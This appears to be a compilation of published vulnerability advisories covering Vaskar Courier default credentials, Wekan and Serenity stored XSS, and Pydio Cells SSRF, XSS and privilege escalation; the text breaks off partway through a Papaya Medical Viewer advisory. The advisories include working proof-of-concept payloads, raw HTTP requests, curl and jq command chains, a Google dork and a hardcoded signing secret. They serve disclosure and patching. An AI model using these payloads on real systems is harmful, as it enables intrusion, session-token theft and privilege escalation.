Vaskar Courier version 3.2.0 appears to leave default credentials installed after installation.

    ================================================================================| # Title     : Vaskar Courier Version 3.2.0 Insecure Settings Vulnerability   || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "Designed and Developed by Vaskar Web"                         |================================================================================poc :[+] The vulnerability is about leaves a default set of administrative credentials installed post installation.[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user = admin & pass= 123 [+] https://127.0.0.1/geetanjalicourier.com/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Vaskar Courier 3.2.0 Insecure Settings

Wekan versions 6.74 and below suffer from a persistent cross site scripting vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20230517-0 >  
=======================================================================  
               title: Stored XSS vulnerability in rename functionality  
             product: Wekan (Open-Source kanban)  
  vulnerable version: <=6.74  
       fixed version: 6.75 or higher  
          CVE number: CVE-2023-28485  
              impact: Medium  
            homepage: https://wekan.github.io  
               found: 2022-12-30  
                  by: Heiner Liesegang (Office Berlin)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an Atos business  
                      Europe | Asia | North America  
                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"WeKan ® is an completely Open Source and Free software collaborative  
kanban board application with MIT license.

Whether you’re maintaining a personal todo list,  
planning your holidays with some friends,  
or working in a team on your next revolutionary idea, Kanban boards  
are an unbeatable tool to keep your things organized.  
They give you a visual overview of the current state of your project,  
and make you productive by allowing you to focus on the few items that  
matter the most."

Source: https://github.com/wekan/wekan

Business recommendation:  
------------------------  
Patch the application with the latest update supplied by the vendor.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2023-28485)  
An authenticated attacker with the role 'BoardAdmin' is able to rename  
file attachments of Kanban cards. Being an admin of the Wekan instance  
is not required in order for this exploit to work, as any user can  
obtain 'BoardAdmin' privileges by creating a new Kanban board.

The 'renameAttachment' method does not sanitise user input and allows embedding  
XSS payloads in the specified filename. The stored XSS payload is triggered by  
opening the attachment as the modified filename is displayed in the header bar  
of the file preview.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2023-28485)  
The following steps are necessary to exploit the vulnerability:  
   1. Log into the application with at least "user" privileges  
  2a. Open a Kanban board in which you have 'BoardAdmin' privileges  
  2b. Or, create a new Kanban board otherwise  
   3. Create a Kanban card if none exists  
   4. Open Kanban card to edit it  
   5. If there is no attachment in the card, upload one  
   6. Click on "Attachment Actions" under the attachment and select "Rename"  
   7. Include arbitrary XSS payload such as the following inside the filename:  
      "<script>alert('Stored XSS')</script>"  
   8. Select "Save" to embed the XSS payload

Any user with access to the board clicking on the attachment preview  
triggers the stored XSS. In case the used Kanban board is set to "public"  
any person with a link to the board can access the targeted card and  
trigger the payload inside the attachments' filename.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested to be vulnerable:  
* v6.64  
* v6.69  
* v6.71

According to the vendor, all versions before 6.75 are affected as well.

Vendor contact timeline:  
------------------------  
2023-02-16: Contacting vendor security contact through support@wekan.team.  
2023-02-21: Vendor responded requesting a recheck of fixes in version 6.75.  
2023-02-27: Security patch is confirmed to fix vulnerability.  
2023-03-14: CVE number requested.  
2023-05-17: Public release of security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately.  
The version 6.75 or higher provides the corresponding security patch:  
https://github.com/wekan/wekan

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an Atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an Atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Heiner Liesegang / @2023

Wekan 6.74 Cross Site Scripting

Serenity and StartSharp Software versions prior to 6.7.1 suffer from file upload to cross site scripting, user enumeration, and reusable password reset token vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230516-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Serenity and StartSharp Software  
  vulnerable version: < 6.7.1  
       fixed version: 6.7.1 or higher  
          CVE number: CVE-2023-31285, CVE-2023-31286, CVE-2023-31287  
              impact: high  
            homepage: https://serenity.is  
               found: 2023-02-28  
                  by: Fabian Densborn (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an Atos business  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
Serenity Software is a software vendor that distributes the Serenity Platform.  
"Serenity is an ASP.NET Core / TypeScript application platform designed to  
simplify and shorten development of data-centric business applications with  
a service based architecture."

Source: https://github.com/serenity-is

Business recommendation:  
------------------------  
SEC Consult recommends Serenity users to install the latest update and review  
the vendor's changelog for further information.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285)  
The application allows users to upload profile pictures for users.  
It was identified that an attacker has the possibility to upload  
arbitrary malicious files. Although some specific file endings are  
not allowed, it is still possible to upload files without an extension.

It was possible to:  
• Upload malicious HTML files that will infect the user's browser with malicious  
   JavaScript. As a result, the user's DOM is fully compromised.  
• Upload malware that will infect the user's operating system upon download and  
   local execution.

Note:  
Although the option for uploading new profile pictures is only visible to power users,  
users with lower privileges can still trigger the upload functionality.

2) User Enumeration (CVE-2023-31286)  
It is possible to collect valid email addresses by interacting with the  
"forgot password" function of the application. This vulnerability is  
useful to increase the efficiency of brute-force attacks. If the email  
address is known, it is easier to find the corresponding password.

3) Reusable Password Reset Tokens (CVE-2023-31287)  
The web application provides the possibility to reset the password via  
email. The corresponding email contains a password reset link which includes  
a user-specific token. When visiting the link, the user can set a new  
password for this account. After changing the password, the password reset link  
remains valid (3 hours) and can be used a second time to change the password  
of the user.

Proof of concept:  
-----------------  
1) Arbitrary File Upload to Stored Cross-Site Scripting (XSS) (CVE-2023-31285)  
A user can upload arbitrary files to the server, but some file extensions  
like .aspx are not allowed. Nevertheless, malicious files like Word documents  
with enabled macros or other executable malware can be uploaded. There also  
seems to be no anti-virus scan enabled for these files, as it is possible to  
upload the EICAR test file which is flagged as malicious by all antivirus  
software.

Additionally, it is also possible to attack a privileged power user, by  
generating a malicious HTML page, that on visit escalates the role of the  
attacker user. This is possible, because the file is uploaded to the same  
domain and therefore the containing JavaScript executes in the same context as  
the application. The impact of this vulnerability is therefore equal to that  
of a stored XSS vulnerability.

To upload a malicious HTML file an authenticated user without the role of a  
power user can send the following request:  
--------------------------------------------------  
POST /File/TemporaryUpload HTTP/2  
Host: demo.serenity.is  
Cookie: [...]  
Content-Type: multipart/form-data; boundary=--boundary  
Origin: https://demo.serenity.is  
[...]

--boundary  
Content-Disposition: form-data; name="Serenity_ImageUploadEditor31[]"; filename="test.html"  
Content-Type: image/png

<html>  
<head></head>  
<body>  
<h1>SEC Consult</h1>  
<script>alert(document.domain)</script>  
</body>  
</html>  
--boundary--  
--------------------------------------------------

The response reveals the path of the uploaded file:  
--------------------------------------------------  
HTTP/2 200 OK  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json  
[...]

{  
     "TemporaryFile":"temporary/f3c960aca7724409a3c4c6e597ce5b92.html",  
     "Size":110,  
     "IsImage":false,  
     "Width":0,  
     "Height":0  
}  
--------------------------------------------------

The uploaded file can then be found under /upload/temporary/f3c960aca7724409a3c4c6e597ce5b92.html.

The final link will look benign thus it is possible to attack administrator  
users and escalate the privileges of the own user.

2) User Enumeration (CVE-2023-31286)  
The "forgot password" page lets users request a new password reset mail.  
They need to enter their email address which corresponds to their account  
and receive a mail containing a link to reset their password. Unfortunately,  
the response of this request leaks if a user with the provided email address  
exists or not. If an attacker wants to check if a user account with a  
specific email exists, he can send the following request:

--------------------------------------------------  
POST /Account/ForgotPassword HTTP/2  
Host: demo.serenity.is  
Origin: https://demo.serenity.is  
Content-Type: application/json  
[...]

{  
     "Email":"emailToCheck@sec-consult.com"  
}  
--------------------------------------------------

If the user with this mail does not exist, the response will look like this:  
--------------------------------------------------  
HTTP/2 400 Bad Request  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json

{  
     "Error": {  
         "Code":"CantFindUserWithEmail",  
         "Message":"Can't find a user with that e-mail adress!"  
     }  
}  
--------------------------------------------------

If the user with this mail address does exist, the response will look like  
this:  
--------------------------------------------------  
HTTP/2 200 OK  
Server: nginx/1.18.0 (Ubuntu)  
Content-Type: application/json  
[...]

{}  
--------------------------------------------------

3) Reusable Password Reset Tokens (CVE-2023-31287)  
When resetting the password via the "forgot password" functionality on the  
login screen, an email containing a password reset link is sent to the user.  
When clicking on this link, a user can choose a new password for his account.  
However, after changing the password to a new one, the password reset link  
remains valid. It can be used a second time to update the user's password  
although it was already changed. If an attacker gets access to the browser  
history of the user, he can change the password of the user's account and  
access it afterwards.

Vulnerable / tested versions:  
-----------------------------  
The following versions are affected:  
< 6.7.0

Vendor contact timeline:  
------------------------  
2023-04-05: Contacting vendor through sales@serenity.is  
2023-04-05: Vendor responds to send advisory to support@serenity.is  
2023-04-05: Advisory sent to vendor.  
2023-04-06: Vendor released fixes for all three vulnerabilities,  
             file upload vulnerability was not fixed properly though.  
2023-04-07: SEC Consult informs vendor about not properly fixed file upload.  
2023-04-07: Vendor released proper fix for file upload vulnerability in v6.7.1.  
2023-04-27: CVE numbers assigned.  
2023-05-16: Public release of security advisory.

Solution:  
---------  
The vendor provides a patch v6.7.1 which includes the fixes for the identified  
security issues.

The new version can be downloaded here:  
https://github.com/serenity-is/Serenity

The vendor explicitly notes the following in the changelog:

"Serene/StartSharp users must either create a new project from the 6.7.0+ template  
or manually apply the relevant changes from this commit to their existing  
applications after updating Serenity packages to 6.7.0+"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an Atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an Atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Fabian Densborn / @2023

Serenity / StartSharp Software File Upload / XSS / User Enumeration / Reusable Tokens

Pydio Cells versions 4.1.2 and below suffer from a server-side request forgery vulnerability.

For longer running processes, Pydio Cells allows for the creation of  
jobs, which are run in the background. The job "remote-download" can be  
used to cause the backend to send a HTTP GET request to a specified URL  
and save the response to a new file. The response file is then available  
in a user-specified folder in Pydio Cells.

Details  
=======

Product: Pydio Cells  
Affected Versions: 4.1.2 and earlier versions  
Fixed Versions: 4.2.0, 4.1.3, 3.0.12  
Vulnerability Type: Server-Side Request Forgery  
Security Risk: medium  
Vendor URL: https://pydio.com/  
Vendor Status: notified  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005  
Advisory Status: published  
CVE: CVE-2023-32750  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750

Introduction  
============

"Pydio Cells is an open-core, self-hosted Document Sharing and  
Collaboration platform (DSC) specifically designed for organizations  
that need advanced document sharing and collaboration without security  
trade-offs or compliance issues."

(from the vendor's homepage)

More Details  
============

Using the REST-API of Pydio Cells it is possible to start jobs. For  
example, when renaming a file or folder an HTTP request similar to the  
following is sent:

------------------------------------------------------------------------  
PUT /a/jobs/user/move HTTP/2  
Host: example.com  
User-Agent: agent  
Accept: application/json  
Authorization: Bearer G4ZRN[...]  
Content-Type: application/json  
Content-Length: 140

{  
  "JobName": "move",  
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"  
}  
------------------------------------------------------------------------

The body contains a JSON object with a job name and additional  
parameters for the job. Besides the "move" job, also a job with the name  
"remote-download" exists. It takes two additional parameters: "urls" and  
"target". In the "urls" parameter, a list of URLs can be specified and in  
the parameter "target" a path can be specified in which to save the  
response. When the job is started, HTTP GET requests are sent from the  
Pydio Cells server to the specified URLs. The responses are saved into a  
file, which are uploaded to the specified folder within Pydio Cells.  
Potential errors are transmitted in a WebSocket channel, which can be  
opened through the "/ws/event" endpoint.

Proof of Concept  
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then,  
run the following commands to start a "remote-download" job to trigger  
an HTTP request:

------------------------------------------------------------------------  
$ export JWT="<insert JWT here>"

$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \  
| jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \  
| tee remote-download.json

$ curl --header "Authorization: Bearer $JWT" \  
--header 'Content-Type: application/json' \  
--request PUT \  
--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'  
------------------------------------------------------------------------

The URL in the JSON document specifies which URL to request. The "target"  
field in the same document specifies into which folder the response is saved.  
Afterwards, the response is contained in a file in the specified folder.  
Potential errors are communicated through the WebSocket channel.

Workaround  
==========

Limit the services which can be reached by the Pydio Cells server, for  
example using an outbound firewall.

Fix  
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk  
=============

The risk is highly dependent on the environment in which the attacked  
Pydio Cells instance runs. If there are any internal HTTP services which  
expose sensitive data on the same machine or within the same network,  
the server-side request forgery vulnerability could pose a significant  
risk. In other circumstances, the risk could be negligible. Therefore,  
overall the vulnerability is rated as a medium risk.

Timeline  
========

2023-03-23 Vulnerability identified  
2023-05-02 Customer approved disclosure to vendor  
2023-05-02 Vendor notified  
2023-05-03 CVE ID requested  
2023-05-08 Vendor released fixed version  
2023-05-14 CVE ID assigned  
2023-05-16 Vendor asks for a few more days before the advisory is released  
2023-05-30 Advisory released

References  
==========

RedTeam Pentesting GmbH  
=======================

RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.

More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting  
=============================

RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://jobs.redteam-pentesting.de/

--   
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0  
Alter Posthof 1                           Fax : +49 241 510081-99  
52062 Aachen                    https://www.redteam-pentesting.de  
Germany                         Registergericht: Aachen HRB 14004  
Geschäftsführer:                       Patrick Hof, Jens Liebchen

Pydio Cells 4.1.2 Server-Side Request Forgery 

Pydio Cells versions 4.1.2 and below implement the download of files using presigned URLs which are generated using the Amazon AWS SDK for JavaScript. The secrets used to sign these URLs are hardcoded and exposed through the JavaScript files of the web application. Therefore, it is possible to generate valid signatures for arbitrary download URLs. By uploading an HTML file and modifying the download URL to serve the file inline instead of as an attachment, any included JavaScript code is executed when the URL is opened in a browser, leading to a cross site scripting vulnerability.

Advisory: Pydio Cells: Cross-Site Scripting via File Download

Pydio Cells implements the download of files using presigned URLs which  
are generated using the Amazon AWS SDK for JavaScript [1]. The secrets  
used to sign these URLs are hardcoded and exposed through the JavaScript  
files of the web application. Therefore, it is possible to generate  
valid signatures for arbitrary download URLs. By uploading an HTML file  
and modifying the download URL to serve the file inline instead of as an  
attachment, any included JavaScript code is executed when the URL is  
opened in a browser, leading to a cross-site scripting vulnerability.

Details  
=======

Product: Pydio Cells  
Affected Versions: 4.1.2 and earlier versions  
Fixed Versions: 4.2.0, 4.1.3, 3.0.12  
Vulnerability Type: Cross-Site Scripting  
Security Risk: high  
Vendor URL: https://pydio.com/  
Vendor Status: notified  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004  
Advisory Status: published  
CVE: CVE-2023-32751  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751

Introduction  
============

"Pydio Cells is an open-core, self-hosted Document Sharing and  
Collaboration platform (DSC) specifically designed for organizations  
that need advanced document sharing and collaboration without security  
trade-offs or compliance issues."

(from the vendor's homepage)

More Details  
============

When a file named "xss.html" is downloaded in the Pydio Cells web application, a  
download URL similar to the following is generated:

https://example.com/io/xss/xss.html  
  ?AWSAccessKeyId=gateway  
  &Expires=1682495748  
  &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D  
  &response-content-disposition=attachment%3B%20filename%3Dxss.html  
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

The URL is akin to a presigned URL as used by the Amazon S3 service. It  
contains the URL parameter "response-content-disposition" which is set  
to "attachment" causing the response to contain a "Content-Disposition"  
header with that value. Therefore, the browser downloads the file  
instead of interpreting it. The URL also contains a signature and expiry  
timestamp, which are checked by the backend. Unlike a presigned URL as used  
by S3, the URL also contains the parameter "pydio_jwt" with the JWT of  
the user for authentication. Furthermore, the access key with the ID  
"gateway" is referenced, which can be found in the JavaScript sources of  
Pydio Cells together with the secret:

------------------------------------------------------------------------  
_awsSdk.default.config.update({  
  accessKeyId: 'gateway',  
  secretAccessKey: 'gatewaysecret',  
  s3ForcePathStyle: !0,  
  httpOptions: {  
    timeout: PydioApi.getMultipartUploadTimeout()  
  }  
});  
------------------------------------------------------------------------

With this information it is possible to change the URL parameter  
"response-content-disposition" to the value "inline" and then calculate  
a valid signature for the resulting URL. Furthermore, the content type of  
the response can be changed to "text/html" by also adding the URL  
parameter "response-content-type" with that value. This would result in  
a URL like the following for the previously shown example URL:

https://example.com/io/xss/xss.html?  
  AWSAccessKeyId=gateway  
  &Expires=1682495668  
  &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D  
  &response-content-disposition=inline  
  &response-content-type=text%2Fhtml  
  &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

Upon opening the URL in a browser, the HTML included in the file is  
interpreted and any JavaScript code is run.

Proof of Concept  
================

Upload a HTML file into an arbitrary location of a Pydio Cells instance.  
For example with the following contents:

------------------------------------------------------------------------  
<html>  
  <body>  
    <h1>Cross-Site Scriping</h1>  
    <script>  
      let token = JSON.parse(localStorage.token4).AccessToken;  
      alert(token);  
    </script>  
  </body>  
</html>  
------------------------------------------------------------------------

The contained JavaScript code reads the JWT access token for Pydio Cells  
from the browser's local storage object and opens a message box. Instead  
of just displaying the JWT, it could also be sent to an attacker. The  
following JavaScript function can then be run within the browser's  
developer console to generate a presigned URL for the HTML file:

------------------------------------------------------------------------  
async function getPresignedURL(path) {  
  let client = PydioApi.getClient();  
  let node = new AjxpNode(path);  
  let metadata = {Bucket: "io", ResponseContentDisposition: "inline", Key: path, ResponseContentType: "text/html"};  
  let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);

  return url;  
}

await getPresignedURL("xss/xss.html");  
------------------------------------------------------------------------

The code has to be run in context of Pydio Cells while being logged in.  
If the resulting URL is opened in a browser, the JavaScript code  
contained in the HTML file is run. If the attack is conducted in the  
described way, the JWT of the attacker is exposed through the URL.  
However, this can be circumvented by first generating a public URL  
for the file and then constructing the presigned URL based on the  
resulting download URL.

Workaround  
==========

No workaround known.

Fix  
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk  
=============

Attackers that can upload files to a Pydio Cells instance can construct  
URLs that execute arbitrary JavaScript code in context of Pydio Cells  
upon opening. This could for example be used to steal the authentication  
tokens of users opening the URL. It is likely that such an attack  
succeeds, since sharing URLs to files hosted using Pydio Cells is a  
common use case of the application. Therefore, the vulnerability is  
estimated to pose a high risk.

Timeline  
========

2023-03-23 Vulnerability identified  
2023-05-02 Customer approved disclosure to vendor  
2023-05-02 Vendor notified  
2023-05-03 CVE ID requested  
2023-05-08 Vendor released fixed version  
2023-05-14 CVE ID assigned  
2023-05-16 Vendor asks for a few more days before the advisory is released  
2023-05-30 Advisory released

References  
==========

[1] https://aws.amazon.com/sdk-for-javascript/

RedTeam Pentesting GmbH  
=======================

RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.

More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting  
=============================

RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://jobs.redteam-pentesting.de/

--   
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0  
Alter Posthof 1                           Fax : +49 241 510081-99  
52062 Aachen                    https://www.redteam-pentesting.de  
Germany                         Registergericht: Aachen HRB 14004  
Geschäftsführer:                       Patrick Hof, Jens Liebchen

Pydio Cells 4.1.2 Cross Site Scripting

Pydio Cells versions 4.1.2 and below suffer from a privilege escalation vulnerability. It allows users, by default, to create so-called external users in order to share files with them. By modifying the HTTP request sent when creating such an external user, it is possible to assign the new user arbitrary roles. By assigning all roles to a newly created user, access to all cells and non-personal workspaces is granted.

    Advisory: Pydio Cells: Unauthorised Role AssignmentsPydio Cells allows users by default to create so-called external usersin order to share files with them. By modifying the HTTP request sentwhen creating such an external user, it is possible to assign the newuser arbitrary roles. By assigning all roles to a newly created user, access toall cells and non-personal workspaces is granted.Details=======Product: Pydio CellsAffected Versions: 4.1.2 and earlier versionsFixed Versions: 4.2.0, 4.1.3, 3.0.12Vulnerability Type: Privilege EscalationSecurity Risk: highVendor URL: https://pydio.com/Vendor Status: notifiedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003Advisory Status: publishedCVE: CVE-2023-32749CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749Introduction============"Pydio Cells is an open-core, self-hosted Document Sharing andCollaboration platform (DSC) specifically designed for organizationsthat need advanced document sharing and collaboration without securitytrade-offs or compliance issues."(from the vendor's homepage)More Details============Users can share cells or folders with other users on the same Pydioinstance. The web application allows to either select an alreadyexisting user from a list or to create a new user by entering a newusername and password, if this functionality is enabled. When creating anew user in this way, a HTTP PUT request like the following is sent:------------------------------------------------------------------------PUT /a/user/newuser HTTP/2Host: example.comUser-Agent: agentAuthorization: Bearer O48gvjD[...]Content-Type: application/jsonContent-Length: 628Cookie: token=AO[...]{  "Attributes": {    "profile": "shared",    "parameter:core.conf:lang": "\"en-us\"",    "send_email": "false"  },  "Roles": [],  "Login": "newuser",  "Password": "secret!",  "GroupPath": "/",  "Policies": [...]}------------------------------------------------------------------------The JSON object sent in the body contains the username and passwordfor the user to be created and an empty list for the key "Roles". Theresponse contains a JSON object similar to the following:------------------------------------------------------------------------{  "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",  "GroupPath": "/",  "Attributes": {    "parameter:core.conf:lang": "\"en-us\"",    "profile": "shared"  },  "Roles": [    {      "Uuid": "EXTERNAL_USERS",      "Label": "External Users",      "Policies": [...]    },    {      "Uuid": "58811c4c-2286-4ca0-8e8a-14ab9dbca8ce",      "Label": "User newuser",      "UserRole": true,      "Policies": [...]    }  ],  "Login": "newuser",  "Policies": [....],  "PoliciesContextEditable": true}------------------------------------------------------------------------The key "Roles" now contains a list with two objects, which seem to beapplied by default. The roles list in the HTTP request can bemodified to contain a list of all available UUIDs for roles, which canbe obtained by using the user search functionality. This results in anew user account with all roles applied. By performing a login as thenewly created user, access to all cells and non-personal workspaces ofthe whole Pydio instance is granted.Proof of Concept================Login to the Pydio Cells web interface with a regular user and retrievethe JWT from the HTTP requests. This can either be done using an HTTPattack proxy or using the browser's developer tools. Subsequently, curl [1]can be used as follows to retrieve a list of all users and their roles:------------------------------------------------------------------------$ export JWT="<insert JWT here>"$ curl --silent \--header "Authorization: Bearer $TOKEN" \--header 'Content-Type: application/json' \--data '{}' \https://example.com/a/user | tee all_users.json{"Users":[...]}------------------------------------------------------------------------Afterwards, jq [2] can be used to create a JSON document which can besent to the Pydio REST-API in order to create the external user "foobar"with the password "hunter2" and all roles assigned:------------------------------------------------------------------------$ jq '.Users[].Roles' all_users.json \| jq -s 'flatten | .[].Uuid | {Uuid: .}' \| jq -s 'unique' \| jq '{"Login": "foobar", "Password": "hunter2", "Attributes":{"profile": "shared"}, "Roles": .}' \| tee create_user.json{  "Login": "foobar",  "Password": "hunter2",  "Attributes": {    "profile": "shared"  },  "Roles": [...]}------------------------------------------------------------------------Finally, the following curl command can be issued to create the new externaluser:------------------------------------------------------------------------$ curl --request PUT \--silent \--header "Authorization: Bearer $JWT" \--header 'Content-Type: application/json' \--data @create_user.json \https://example.com/a/user/foobar------------------------------------------------------------------------Now, login with the newly created user to access all cells andnon-personal workspaces.Workaround==========Disallow the creation of external users in the authentication settings.Fix===Upgrade Pydio Cells to a version without the vulnerability.Security Risk=============Attackers with access to any regular user account for a Pydio Cells instance canextend their privileges by creating a new external user with all rolesassigned. Subsequently, they can access all folders and files in anycell and workspace, except for personal workspaces. The creation ofexternal users is activated by default. Therefore, the vulnerability isestimated to pose a high risk.Timeline========2023-03-23 Vulnerability identified2023-05-02 Customer approved disclosure to vendor2023-05-02 Vendor notified2023-05-03 CVE ID requested2023-05-08 Vendor released fixed version2023-05-14 CVE ID assigned2023-05-16 Vendor asks for a few more days before the advisory is released2023-05-30 Advisory releasedReferences==========[1] https://curl.se/[2] https://stedolan.github.io/jq/RedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at:https://www.redteam-pentesting.de/Working at RedTeam Pentesting=============================RedTeam Pentesting is looking for penetration testers to join our teamin Aachen, Germany. If you are interested please visit:https://jobs.redteam-pentesting.de/-- RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0Alter Posthof 1                           Fax : +49 241 510081-9952062 Aachen                    https://www.redteam-pentesting.deGermany                         Registergericht: Aachen HRB 14004Geschäftsführer:                       Patrick Hof, Jens Liebchen

Pydio Cells 4.1.2 Privilege Escalation

Papaya Medical Viewer version 1.0 suffers from a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2022-001: Cross-Site-Scripting in Papaya Medical Viewer

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-33255

Link  
====

https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-001.txt

Further SCHUTZWERK advisories:  
https://www.schutzwerk.com/blog/tags/advisories/

Affected products/vendor  
========================

Papaya, Research Imaging Institute - University of Texas Health Science   
Center

Summary  
=======

User supplied input in the form of DICOM or NIFTI images can be loaded   
into the  
Papaya web application without any kind of sanitization. This allows to   
inject  
arbitrary JavaScript code into the image's metadata which will in   
consequence be  
executed as soon as the metadata is displayed in the Papaya web application.

Risk  
====

The vulnerability allows an attacker to inject arbitrary JavaScript code   
into  
the Papaya web application. A risk calculation highly depends on how the   
Papaya  
software is used as a library in the context of a bigger medical web  
application. During the discovery of this vulnerability, the web application  
which used Papaya allowed to upload and store corresponding images on   
the web  
server and display them to multiple users. It was therefore possible to   
store  
JavaScript code on the server and attack users to impersonate or steal their  
session, leading to a disclosure of sensitive medical data.

Description  
===========

A medical web application assessed for security vulnerabilities by   
SCHUTZWERK  
